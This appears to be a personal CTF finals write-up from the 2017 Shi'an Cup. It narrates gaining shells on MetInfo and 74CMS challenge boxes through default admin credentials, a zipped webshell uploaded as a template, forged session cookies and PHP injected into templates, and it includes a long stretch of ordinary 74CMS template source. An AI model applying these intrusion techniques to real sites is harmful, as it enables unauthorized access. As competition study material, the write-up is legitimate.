[2017 Shi'an Cup (世安杯)] Finals Writeup
Spent the whole day dragging around a body wrecked by a cold and a headache... going straight to sleep once this is written...
Today's finals were split into:
- A morning "comprehensive penetration test" (personally I'd call it a CTF, since, honestly, the three challenge servers appeared to be unreachable from one another...)
- An afternoon AWD (unsurprisingly, still only one challenge)
The morning penetration test was three CMSes: MetInfo 5.x, 骑士CMS (74CMS), and an easycms... (I really can't remember the version numbers...)
Challenge 1: MetInfo
- One flag in the cookie
- One flag in robots.txt
- Weak password (admin / MetInfo) got me into the admin backend
- Saw a template upload there. It only allows zip and the like, with the extension check locked down tight. Noticed that the bundled templates exist as many separate files, so it is a reasonable guess that there is an unzip step somewhere. So I wrote a one-line webshell, packed it into a zip and uploaded it as a template; the .php came out extracted under the templates directory. Getshell, straight into Caidao (菜刀). This was a Windows box, Orz, which made things a bit awkward at first... I don't really know Windows commands.
- Found a flag in the flag4 folder under the User directory
- Saw a flag in upload\file under the web root
- One more that I forget where I found... a file named flag5.png; a hexdump of it revealed flag5
Challenge 2: 骑士CMS (74CMS)
- Server misconfiguration exposed directory listings for some directories (those without an index.php / index.html; the relevant Apache setting is Indexes under Options in the Directory block)
- One flag in the cookie
- One flag in robots.txt // I think
- While browsing the listings I found the PHP session store; looking through it I saw a session value carrying an admin record, so I forged it right away with document.cookie="PHPSESSID=xxx" and logged into the backend
- In the backend I found template editing for htm files, full of mustache-style tags like the ones in Laravel's Blade engine, i.e.
{{ }}
and so on (in the source below the delimiters are {# ... #}). Guessed that PHP could be inserted directly, so added <?php phpinfo();?>
It executed, so getshell and start rummaging for flags.
- The Apache process runs as the user apache
- First, in the web root there is a file AAAAAAAAflag.txt with one flag
- Next, in the filesystem root there is a /flag directory; it is mode 700, but the owner is apache, so chmod 777, go in and read .flag.txt for one flag
- Finally, running find / -name flag turned up a flag directory under /var/lib/mysql/; this time the owner is mysql and there is no read permission. cat /etc/group showed mysql is in a group of its own, so I thought about privilege escalation here... but I have not really done that before... so I gave up
Attaching part of the template source:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />{#qishi_pageinfo set="列表名:page,调用:QS_index"#}
<title>Welcome 74CMS</title>
<meta name="description" content="{#$page.description#}">
<meta name="keywords" content="{#$page.keywords#}">
<meta http-equiv="X-UA-Compatible" content="edge">
<link rel="shortcut icon" href="{#$QISHI.site_dir#}favicon.ico" />
<meta name="author" content="骑士CMS" />
<meta name="copyright" content="74cms.com" />
<link href="{#$QISHI.site_template#}css/common.css" rel="stylesheet" type="text/css" />
<link href="{#$QISHI.site_template#}css/index.css" rel="stylesheet" type="text/css" />
<script src="{#$QISHI.site_template#}js/jquery.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/index_foucs.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.dropDownWidget.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.newindex.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.lazyload.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_template#}js/jquery.autocomplete.js" type="text/javascript" language="javascript"></script>
<script src="{#$QISHI.site_dir#}data/cache_classify.js" type="text/javascript" charset="utf-8"></script>
<script type="text/javascript">
jQuery(document).ready(function($) {
//选项卡切换
$(".n-tab-control>a").each(function(){
$(this).click(function(){
$(this).addClass("select");
$(this).siblings("a").removeClass("select");
var bull_index = $(".n-tab-control>a").index(this);
$(".news-tab-box>ul").eq(bull_index).show().siblings().hide();
})
});
//登录
$.get('{#$QISHI.site_dir#}plus/ajax_user.php?act=loginform', function(data) {
$("#ajax_login").html(data);
// 选择登录方式
var wxrun = '';
$('.loginicon').toggle(function(){
$('#pcLogin').hide();
$('#codeLogin').show();
$('#login-box h1').html('微信登录');
$(this).attr('title', '用户名登录');
$(this).removeClass('wx').addClass('pc');
{#if $QISHI.weixin_apiopen=='1' && $QISHI.weixin_scan_login=='1' && $smarty.session.username==''#}
wxrun = window.setInterval(run, 5000);
function run(){
$.get("{#$QISHI.site_dir#}m/login.php?act=waiting_weixin_login",function(data){
if(data=="1"){
window.location="{#$QISHI.site_dir#}";
}
});
}
{#/if#}
}, function(){
$('#pcLogin').show();
$('#codeLogin').hide();
$('#login-box h1').html('会员登录');
$(this).attr('title', '微信登录');
$(this).removeClass('pc').addClass('wx');
{#if $QISHI.weixin_apiopen=='1' && $QISHI.weixin_scan_login=='1' && $smarty.session.username==''#}
window.clearInterval(wxrun);
{#/if#}
});
});
// 左侧下拉
$.dropDownWidget(".job-sort-wrap");
// 首页的一些js
index("{#$QISHI.site_dir#}","{#$QISHI.site_template#}");
// 工作地区填充数据
city_filldata("#city_list", QS_city_parent, QS_city, "#result-list-city", "#aui_outer_city", "#cityForIndexSearch", "#citycategory");
//
$('.floor-item:first').find('.floor-title').css({'margin-top':5});
$(".core-function").live('click', function(event) {
window.location.href = $(this).attr("code");
});
});
</script>
</head>
<body {#if $QISHI.body_bgimg#}style="background:url({#$QISHI.site_domain#}{#$QISHI.site_dir#}data/{#$QISHI.updir_images#}/{#$QISHI.body_bgimg#}) repeat-x center 38px;"{#/if#}>
{#include file="header.htm"#}
<!-- 主体 -->
<div class="container-index">
<div class="complex-main clearfix">
<div class="complex-left f-left">
<div class="job-sort-wrap">
<div class="job-sort-control">全部职位分类<i class="sotr-icon"></i></div>
<div class="job-sort-list"></div>
<div class="leftmenu_box"></div>
</div>
<div class="bolck-nav clearfix">
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}jobs" target="_blank">
<i class="b-nav-icon icon1"></i>
<p>找工作</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}resume" target="_blank">
<i class="b-nav-icon icon2"></i>
<p>找人才</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}user/company/company_jobs.php?act=addjobs" target="_blank">
<i class="b-nav-icon icon9"></i>
<p>发职位</p>
</a>
<a class="b-nav-item f-left" href="{#$QISHI.site_dir#}user/personal/personal_resume.php?act=make1" target="_blank">
<i class="b-nav-icon icon4"></i>
<p>创简历</p>
</a>
<a class="b-nav-item f-left" href="{#"QS_simplelist"|qishi_url#}" target="_blank">
<i class="b-nav-icon icon5"></i>
<p>微商圈</p>
</a>
<a class="b-nav-item f-left" href="{#"QS_hrtoolsindex"|qishi_url#}" target="_blank">
<i class="b-nav-icon icon6"></i>
<p>HR工具</p>
</a>
</div>
<div class="news-tab">
<div class="n-tab-control clearfix">
<a href="javascript:;" class="f-left tab-ctrl select">公告</a>
<a href="javascript:;" class="f-left tab-ctrl">资讯</a>
<a href="javascript:;" class="f-left tab-ctrl">帮助</a>
</div>
<div class="news-tab-box">
<!-- 公告 -->
<ul>
{#qishi_notice_list set="列表名:notice,显示数目:9,标题长度:12,分类:1,填补字符:..."#}
{#foreach from=$notice item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
<!-- 资讯 -->
<ul style="display: none;">
{#qishi_news_list set="列表名:news,显示数目:9,标题长度:12,分类:1,填补字符:...,排序:id>desc"#}
{#foreach from=$news item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
<!-- 帮助 -->
<ul style="display: none;">
{#qishi_help_list set="列表名:help,显示数目:9,标题长度:12,填补字符:..."#}
{#foreach from=$help item=list#}
<li><i class="tab-icon"></i><a href="{#$list.url#}" target="_blank" title="{#$list.title_#}" class="underline">{#$list.title#}</a></li>
{#/foreach#}
</ul>
</div>
</div>
</div>
<div class="complex-center f-left">
<!-- 搜索 -->
<div class="search-wrap clearfix">
<div class="search-box f-left">
<div class="search-type f-left">
<div title="找工作" code="QS_jobslist" data="请输入职位名称或企业名称" class="search-type-show"><span>找工作</span><i class="search-icon"></i></div>
<div title="找人才" code="QS_resumelist" data="请输入简历关键字" class="search-type-drop"><a href="javascript:;">找人才</a></div>
</div>
<div class="search-text f-left">
<input type="text" name="keyForIndexSearch" id="keyForIndexSearch" placeholder="请输入职位名称或企业名称" />
</div>
</div>
<div class="search-box f-left">
<div class="search-area-box"><input type="text" name="cityForIndexSearch" id="cityForIndexSearch" placeholder="请输入工作地区" /></div>
</div>
<div class="search-submit f-left"><input type="button" name="btnForIndexSearch" id="btnForIndexSearch" code="QS_jobslist" value="搜索" class="search-submit" /></div>
<input type="hidden" name="citycategory" id="citycategory" value="">
<!-- 工作地区弹出框 -->
<div class="aui_outer" id="aui_outer_city">
<table class="aui_border">
<tbody>
<tr>
<td class="aui_c">
<div class="aui_inner">
<table class="aui_dialog">
<tbody>
<tr>
<td class="aui_main">
<div class="aui_content" style="padding: 0px;">
<div class="LocalDataMultiC" style="width:623px;">
<div class="selector-header"><span class="selector-title">选择地区</span><div></div><span id="ct-selector-save" class="selector-save">确定</span><span class="selector-close">X</span><div class="clear"></div></div>
<div class="data-row-head"><div class="data-row"><div class="data-row-side data-row-side-c">最多选 <strong class="text-warning">3</strong> 项 已选 <strong id="arscity" class="text-warning">0</strong> 项</div><div id="result-list-city" class="result-list data-row-side-ra"></div></div><div class="cla"></div></div>
<div class="data-row-list data-row-main" id="city_list">
<!-- 列表内容 -->
</div>
</div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- 工作地区弹出框 End-->
</div>
<!-- 搜索结束 -->
<div class="swipe-wrap">
{#qishi_ad set="显示数目:6,调用名称:QS_indexfocus,列表名:ad"#}
<div id="playBox">
<div class="pre"></div>
<div class="next"></div>
<div class="smalltitle">
<ul>
{#section loop=$ad name=list#}
<li {#if $smarty.section.list.first#}class="thistitle"{#/if#}></li>
{#/section#}
</ul>
</div>
<ul class="oUlplay">
{#foreach from=$ad item=list#}
<li><a href="{#$list.img_url#}" target="_blank"><img src="{#$list.img_path#}" /></a></li>
{#/foreach#}
</ul>
</div>
</div>
<div class="block-ad-wrap clearfix lazyload">
{#qishi_ad set="显示数目:6,调用名称:QS_indexrecommend,列表名:ad"#}
{#if $ad#}
{#foreach from=$ad item=list#}
{#if $list.img_uid>0#}
<div class="block-ad-item f-left">
<div class="block-ad-logo"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
<div class="block-ad-info">
<h3><a href="{#$list.company_url#}" target="_blank">{#$list.companyname#}</a></h3>
<p><a href="{#$list.jobs.0.jobs_url#}" target="_blank">{#$list.jobs.0.jobs_name#}</a></p>
</div>
</div>
{#else#}
<div class="block-ad-item f-left">
<a href="{#$list.img_url#}" target="_blank">
<img src="{#$QISHI.site_template#}images/index/84.jpg" />
</a>
</div>
{#/if#}
{#/foreach#}
{#/if#}
</div>
</div>
<div class="complex-right f-left">
<div class="login-block" id="ajax_login">
<h4>会员登录</h4>
<div class="login-wrap">
<div class="login-item">
<div class="login-text-box clearfix"><i class="login-icon user f-left"></i><div class="login-input f-left"><input type="text" name="" id="" placeholder="邮箱/手机号/用户名" /></div></div>
</div>
<div class="login-item">
<div class="login-text-box clearfix"><i class="login-icon pass f-left"></i><div class="login-input f-left"><input type="password" name="" id="" placeholder="请输入密码" /></div></div>
</div>
<div class="login-item clearfix">
<label class="auto-login f-left"><input type="checkbox" name="" id="" />自动登录</label>
<a href="" class="forget underline f-right">忘记密码?</a>
</div>
<div class="login-item clearfix">
<div class="login-btn-box f-left"><input type="button" value="立即登录" class="index-login-btn" /></div>
<div class="f-left"><input type="button" value="免费注册" class="index-reg-btn" /></div>
</div>
<div class="third-login clearfix">
<span class="f-left">其他账户登录:</span>
<a href="" class="third-icon qq f-left"></a><a href="" class="third-icon sina f-left"></a><a href="" class="third-icon taobao f-left"></a>
</div>
</div>
</div>
<div class="urgent-block" id="emergencybox">
<div class="urgent-title clearfix">
<h4 class="f-left">紧急招聘</h4>
<a href="{#"QS_jobs"|qishi_url#}" class="underline f-right" target="_blank">更多>></a>
</div>
<ul class="urgent-list">
{#qishi_jobs_list set="列表名:jobs,显示数目:10,职位名长度:12,企业名长度:12,紧急招聘:1,排序:refreshtime>desc"#}
{#foreach from=$jobs item=list#}
<li class="clearfix"><a href="{#$list.company_url#}" class="u-com f-left underline" target="_blank">{#$list.companyname#}</a><a href="{#$list.jobs_url#}" class="u-job f-left underline" title="{#$list.jobs_name_#}" target="_blank">{#$list.jobs_name#}</a></li>
{#/foreach#}
</ul>
</div>
</div>
</div>
<!-- 广告位集中区域 -->
<div class="ad-area">
<!-- 1198*58 广告 -->
{#qishi_ad set="显示数目:3,调用名称:QS_indextopimg,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
</div>
{#/foreach#}
{#/if#}
<!-- 392*58 广告 格子广告-->
{#qishi_ad set="显示数目:6,调用名称:QS_indexcentreimg,列表名:ad,文字长度:12"#}
{#if $ad#}
<div class="ad-row clearfix lazyload">
{#foreach from=$ad item=list#}
<div class="ad-item ad-31 f-left comimgtip">
<a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a>
{#if $list.jobs#}
<!-- 鼠标至上显示 -->
<div class="ad-more-info info31" style="display: none;">
<div class="ad-placeholder"></div>
<ul class="ad-job-list">
{#foreach from=$list.jobs item=jobs_li#}
<li class="clearfix"><div class="jobname f-left"><a href="{#$jobs_li.jobs_url#}" class="underline" target="_blank">{#$jobs_li.jobs_name#}</a></div><div class="jobpay f-left"><span>{#$jobs_li.wage_cn#}</span></div><div class="jobnarea f-left">{#$jobs_li.district_cn#}</div></li>
{#/foreach#}
</ul>
<div class="ad-com-info">
<div class="companyname"><a href="{#$list.company_url#}" class="underline" target="_blank">{#$list.companyname#}</a></div>
<p>{#$list.briefly#}</p>
</div>
<a href="{#$list.company_url#}" class="ad-more" target="_blank">查看更多内容>></a>
</div>
{#/if#}
</div>
{#/foreach#}
</div>
{#/if#}
<!-- 230x58 广告 格子广告-->
{#qishi_ad set="显示数目:10,调用名称:QS_indexcentreimg_230x58,列表名:ad,文字长度:12"#}
{#if $ad#}
<div class="ad-row a23058d clearfix lazyload">
{#foreach from=$ad item=list#}
<div class="ad-item ad-51 f-left comimgtip">
<a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a>
{#if $list.jobs#}
<!-- 鼠标至上显示 -->
<div class="ad-more-info info51" style="display: none;">
<div class="ad-placeholder"></div>
<ul class="ad-job-list">
{#foreach from=$list.jobs item=jobs_li#}
<li class="clearfix"><div class="jobname f-left"><a href="{#$jobs_li.jobs_url#}" class="underline" target="_blank">{#$jobs_li.jobs_name#}</a></div><div class="jobpay f-left"><span>{#$jobs_li.wage_cn#}</span></div></li>
{#/foreach#}
</ul>
<div class="ad-com-info ad-com-info-w">
<div class="companyname"><a href="{#$list.company_url#}" class="underline" target="_blank">{#$list.companyname#}</a></div>
<p>{#$list.briefly#}</p>
</div>
<a href="{#$list.company_url#}" class="ad-more" target="_blank">查看更多内容>></a>
</div>
{#/if#}
</div>
{#/foreach#}
</div>
{#/if#}
</div>
<!-- 广告位集中区域结束 -->
<!-- 列表-推荐职位 -->
<div class="index-data-wrap index-data-wrap-i7">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">推荐职位<span>Recommended Job</span></h4>
<a href="{#"QS_helplist,id:10"|qishi_url#}" class="f-right underline" target="_blank">我是招聘单位,我想出现在这里</a>
</div>
<div class="famous-list clearfix">
{#qishi_companyjobs_list set="列表名:comjob_recommend,显示数目:12,显示职位:3,推荐:1,统计职位:1"#}
{#foreach from=$comjob_recommend item=list#}
<div class="famous-items f-left">
<i class="fc-icon"></i>
<div class="famous-com comtip">
<a href="{#$list.company_url#}" class="underline" target="_balnk">{#$list.companyname#}{#if $QISHI.operation_mode>="2" && $list.setmeal_id>1 #} <img src="{#$QISHI.site_dir#}data/setmealimg/{#$list.setmeal_id#}.gif" />{#/if#}</a>
<div class="famous-more-info" style="display:none;">
<i class="fmi-icon"></i>
<div class="fmi-title">招聘岗位</div>
<ul class="fmi-list">
{#qishi_jobs_list set="列表名:com_jobs_all,显示数目:3,会员UID:$list.uid"#}
{#foreach from=$com_jobs_all item=job_li#}
<li class="clearfix">
<div class="fmi-jobname f-left"><a href="{#$job_li.jobs_url#}" class="underline" target="_balnk">{#$job_li.jobs_name#}</a></div><div class="fmi-time f-left"><span>{#$job_li.refreshtime_cn#}</span></div>
</li>
{#/foreach#}
</ul>
<p>该企业共有{#$list.jobs_num#}个职位,<a href="{#"QS_companyjobs,id:$list.company_id"|qishi_url#}" target="_balnk" class="underline">查看全部</a></p>
</div>
</div>
<div class="famous-job">
{#foreach from=$list.jobs item=jobs_li#}
<span><a href="{#$jobs_li.jobs_url#}" class="underline" target="_balnk">{#$jobs_li.jobs_name#}</a></span>
{#/foreach#}
</div>
</div>
{#/foreach#}
</div>
</div>
<!-- 列表-名企招聘结束 -->
<!-- 1198*58 广告 -->
{#qishi_ad set="显示数目:3,调用名称:QS_indexcenter,列表名:ad,文字长度:12"#}
{#if $ad#}
<div class="ad-area">
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
</div>
{#/foreach#}
</div>
{#/if#}
<!-- 列表-最新职位 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">最新职位<span>Latest Job</span></h4>
<a href="{#"QS_jobslist"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="newest-list clearfix">
{#qishi_companyjobs_list set="列表名:jobs,显示数目:40,职位名长度:12,显示职位:1,企业名长度:12,排序:rtime>desc"#}
{#foreach from=$jobs item=list#}
<div class="newest-items f-left">
<i class="nc-icon"></i>
<a href="{#$list.company_url#}" class="newest-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="newest-job underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
</div>
<!-- 列表-最新职位结束 -->
<!-- 1198*58 广告 -->
{#qishi_ad set="显示数目:3,调用名称:QS_indexfootbanner,列表名:ad,文字长度:12"#}
{#if $ad#}
<div class="ad-area">
{#foreach from=$ad item=list#}
<div class="ad-row clearfix lazyload">
<div class="ad-item ad-full f-left"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
</div>
{#/foreach#}
</div>
{#/if#}
<!-- 列表-照片简历 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">照片简历<span>Photo Resume</span></h4>
<a href="{#"QS_resumelist,photo:1"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="photo-list clearfix">
{#qishi_resume_list set="列表名:resume,显示数目:7,照片:1,意向职位长度:14,填补字符:...,排序:rtime>desc"#}
{#foreach from=$resume item=list#}
<div class="photo-items f-left">
<div class="avater-box">
<div class="avater"><a href="{#$list.resume_url#}" target="_blank"><img src="{#$list.photosrc#}" /></a></div>
<p><a href="{#$list.resume_url#}" target="_blank" class="underline">{#$list.fullname#}</a></p>
</div>
<div class="photo-info">
<p>{#$list.education_cn#},{#$list.experience_cn#}</p>
<p>{#$list.intention_jobs#}</p>
</div>
</div>
{#/foreach#}
</div>
</div>
<!-- 列表-照片简历结束 -->
<!-- 列表-职位导航 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">职位导航<span>Jobs Navigation</span></h4>
</div>
<div class="job-build">
<!-- 楼层1 -->
<div class="floor-item">
<div class="floor-title"><em>1F</em><span>{#"QS_jobs,76"|qishi_categoryname#} · {#"QS_jobs,77"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分类 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,类型:QS_jobs_floor,显示数目:20,id:76_77"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:74|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 职位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,显示数目:10,显示职位:3,职位分类:76_77"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 广告 楼层广告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="显示数目:4,调用名称:QS_floor_img1,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 楼层 2 -->
<div class="floor-item">
<div class="floor-title"><em>2F</em><span>{#"QS_jobs,3"|qishi_categoryname#} · {#"QS_jobs,5"|qishi_categoryname#} · {#"QS_jobs,6"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分类 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,类型:QS_jobs_floor,显示数目:20,id:3_5_6"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:1|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 职位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,显示数目:10,显示职位:3,职位分类:3_5_6"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 广告 楼层广告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="显示数目:4,调用名称:QS_floor_img2,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 楼层 3 -->
<div class="floor-item">
<div class="floor-title"><em>3F</em><span>{#"QS_jobs,117"|qishi_categoryname#} · {#"QS_jobs,120"|qishi_categoryname#} · {#"QS_jobs,121"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分类 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,类型:QS_jobs_floor,显示数目:20,id:117_120_121"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:116|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 职位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,显示数目:10,显示职位:3,职位分类:117_120_121"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 广告 楼层广告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="显示数目:4,调用名称:QS_floor_img3,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 楼层 4 -->
<div class="floor-item">
<div class="floor-title"><em>4F</em><span>{#"QS_jobs,97"|qishi_categoryname#} · {#"QS_jobs,98"|qishi_categoryname#} · {#"QS_jobs,99"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分类 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,类型:QS_jobs_floor,显示数目:20,id:97_98_99"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:96|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 职位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,显示数目:10,显示职位:3,职位分类:97_98_99"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 广告 楼层广告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="显示数目:4,调用名称:QS_floor_img4,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
<!-- 楼层 5 -->
<div class="floor-item">
<div class="floor-title"><em>5F</em><span>{#"QS_jobs,50"|qishi_categoryname#} · {#"QS_jobs,51"|qishi_categoryname#} · {#"QS_jobs,52"|qishi_categoryname#}</span></div>
<div class="floor-box clearfix">
<!-- 分类 -->
<div class="floor-sort f-left">
{#qishi_get_classify set="列表名:subcate,类型:QS_jobs_floor,显示数目:20,id:50_51_52"#}
{#foreach from=$subcate item=list#}
<a href="{#"QS_jobslist,jobcategory:"|cat:49|cat:"."|cat:$list.parentid|cat:"."|cat:$list.id|qishi_url#}" class="f-sort-item f-left" target="_blank">{#$list.categoryname#}</a>
{#/foreach#}
</div>
<!-- 职位 -->
<div class="floor-jobs f-left">
{#qishi_companyjobs_list set="列表名:comjobs,显示数目:10,显示职位:3,职位分类:50_51_52"#}
{#foreach from=$comjobs item=list#}
<div class="f-job-row">
<a href="{#$list.company_url#}" class="f-job-com underline" target="_blank">{#$list.companyname#}</a>
{#foreach from=$list.jobs item=li#}
<a href="{#$li.jobs_url#}" class="f-job-name underline" target="_blank">{#$li.jobs_name#}</a>
{#/foreach#}
</div>
{#/foreach#}
</div>
<!-- 广告 楼层广告1 -->
<div class="floor-ad-box f-left lazyload">
{#qishi_ad set="显示数目:4,调用名称:QS_floor_img5,列表名:ad,文字长度:12"#}
{#if $ad#}
{#foreach from=$ad item=list#}
<div class="floor-ad"><a href="{#$list.img_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/index/84.gif" /></a></div>
{#/foreach#}
{#/if#}
</div>
</div>
</div>
</div>
</div>
<!-- 列表-职位导航结束 -->
<!-- 列表-职场资讯 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">职场资讯<span>Workplace Information</span></h4>
<a href="{#"QS_news"|qishi_url#}" class="f-right underline" target="_blank">更多>></a>
</div>
<div class="job-news-block clearfix">
<div class="jn-left f-left">
{#qishi_news_category set="列表名:newscategory,资讯大类:1,显示数目:4"#}
{#section loop=$newscategory name=nclist#}
<div class="jn-box f-left">
<div class="jn-img f-left"><a href="{#"QS_newslist,id:$newscategory[nclist].id"|qishi_url#}" target="_blank"><img src="{#$QISHI.site_template#}images/news{#$smarty.section.nclist.index#}.jpg" /></a></div>
<ul class="jn-list f-left">
{#qishi_news_list set="列表名:topnews,显示数目:4,标题长度:18,资讯小类:$newscategory[nclist].id,摘要长度:36,填补字符:...,排序:id>desc"#}
{#foreach from=$topnews item=toplist#}
<li><i class="jn-icon"></i><a target="_blank" href="{#$toplist.url#}" class="underline" title="{#$toplist.title_#}" target="_blank">{#$toplist.title#}</a></li>
{#/foreach#}
</ul>
</div>
{#/section#}
</div>
<ol class="jn-right f-left">
{#qishi_news_list set="列表名:news_list,显示数目:8,标题长度:12,填补字符:...,排序:click>desc"#}
{#section loop=$news_list name=nclist start=1#}
<li><span>{#$smarty.section.nclist.index#}</span><a href="{#$news_list[nclist].url#}" class="underline" target="_blank">{#$news_list[nclist].title#}</a></li>
{#/section#}
</ol>
</div>
</div>
<!-- 列表-职场资讯结束 -->
<!-- 列表-友情链接 -->
<div class="index-data-wrap">
<div class="blue-line"></div>
<div class="data-title-box clearfix">
<h4 class="f-left">友情链接<span>Friendly Link</span></h4>
